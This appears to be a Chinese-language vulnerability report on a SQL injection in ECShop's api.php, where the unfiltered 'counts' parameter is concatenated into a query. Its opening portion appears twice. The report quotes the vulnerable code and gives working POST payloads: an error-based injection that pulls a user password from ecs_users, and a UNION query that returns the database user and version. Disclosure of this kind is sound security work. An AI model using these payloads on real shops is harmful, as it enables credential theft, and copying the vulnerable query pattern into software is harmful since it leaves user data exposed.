### 简要描述: 昨天上午没事,闲着 下载了最新版的ecshop 想挑战挑战自己... 下午 客服美眉打电话来,询问下载ECSHOP的目的,哈哈.. 别说 声音挺甜的... 为了抢我的IPAD ,看来还必须赚RANK啊... ### 详细说明: 注:需要网店店主权限 #1 漏洞代码 这个漏洞比较简单,也许是开发人员疏忽了吧... ``` if (is_numeric($_POST['last_modify_st_time']) && is_numeric($_POST['last_modify_en_time'])) { $sql = 'SELECT COUNT(*) AS count' . ' FROM ' . $GLOBALS['ecs']->table('goods') . " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)"; $date_count = $GLOBALS['db']->getRow($sql); if (empty($date_count)) { api_err('0x003', 'no data to back'); //无符合条件数据 } $page = empty($_POST['pages']) ? 1 : $_POST['pages']; //确定读取哪些记录 $counts = empty($_POST['counts']) ? 100 : $_POST['counts']; //我肋个去,这里居然没过滤... $sql = 'SELECT goods_id, last_update AS last_modify' . ' FROM ' . $GLOBALS['ecs']->table('goods') . " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)". " LIMIT ".($page - 1) * $counts . ', ' ....
### 简要描述: 昨天上午没事,闲着 下载了最新版的ecshop 想挑战挑战自己... 下午 客服美眉打电话来,询问下载ECSHOP的目的,哈哈.. 别说 声音挺甜的... 为了抢我的IPAD ,看来还必须赚RANK啊... ### 详细说明: 注:需要网店店主权限 #1 漏洞代码 这个漏洞比较简单,也许是开发人员疏忽了吧... ``` if (is_numeric($_POST['last_modify_st_time']) && is_numeric($_POST['last_modify_en_time'])) { $sql = 'SELECT COUNT(*) AS count' . ' FROM ' . $GLOBALS['ecs']->table('goods') . " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)"; $date_count = $GLOBALS['db']->getRow($sql); if (empty($date_count)) { api_err('0x003', 'no data to back'); //无符合条件数据 } $page = empty($_POST['pages']) ? 1 : $_POST['pages']; //确定读取哪些记录 $counts = empty($_POST['counts']) ? 100 : $_POST['counts']; //我肋个去,这里居然没过滤... $sql = 'SELECT goods_id, last_update AS last_modify' . ' FROM ' . $GLOBALS['ecs']->table('goods') . " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)". " LIMIT ".($page - 1) * $counts . ', ' . $counts;//我肋个天,居然就这样带入了sql语句... //exit($sql); $date_arr = $GLOBALS['db']->getAll($sql);//OH! My god,居然就这样直接查询了... ``` 在这段代码中,POST过来的counts参数 ``` $counts = empty($_POST['counts']) ? 100 : $_POST['counts']; ``` 可以看出来,这里没有经过任何的过滤,接着往下看 ``` $sql = 'SELECT goods_id, last_update AS last_modify' . ' FROM ' . $GLOBALS['ecs']->table('goods') . " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)". " LIMIT ".($page - 1) * $counts . ', ' . $counts;//我肋个天,居然就这样带入了sql语句... ``` 看见了没有,我肋个天,居然就这样带入了sql语句... 后面直接执行了... ``` $date_arr = $GLOBALS['db']->getAll($sql); ``` #2 漏洞利用 这个漏洞比较简单,下面给出漏洞利用POC Step1 访问:http://www.secmap.cn/ecshop/api.php 同时POST提交 ``` ac=true&act=search_goods_list&last_modify_st_time=111&last_modify_en_time=1&api_version=1.0&pages=1&counts=1 union select count(*) from (select 1 union select null union select !1)x group by concat((select password from ecs_users limit 1),floor(rand(0)*2)) -- s ``` 结果报错了,如图: [<img src="https://images.seebug.org/upload/201403/1414321031136574cb8d47e6a3d8eb6241505e86.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1414321031136574cb8d47e6a3d8eb6241505e86.jpg) ### 漏洞证明: #3 漏洞证明 ``` counts=1 union select user(),version()#23 ``` [<img src="https://images.seebug.org/upload/201403/141433348110a5ddfa4ad8cfb32ede7879d6dd19.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/141433348110a5ddfa4ad8cfb32ede7879d6dd19.jpg)
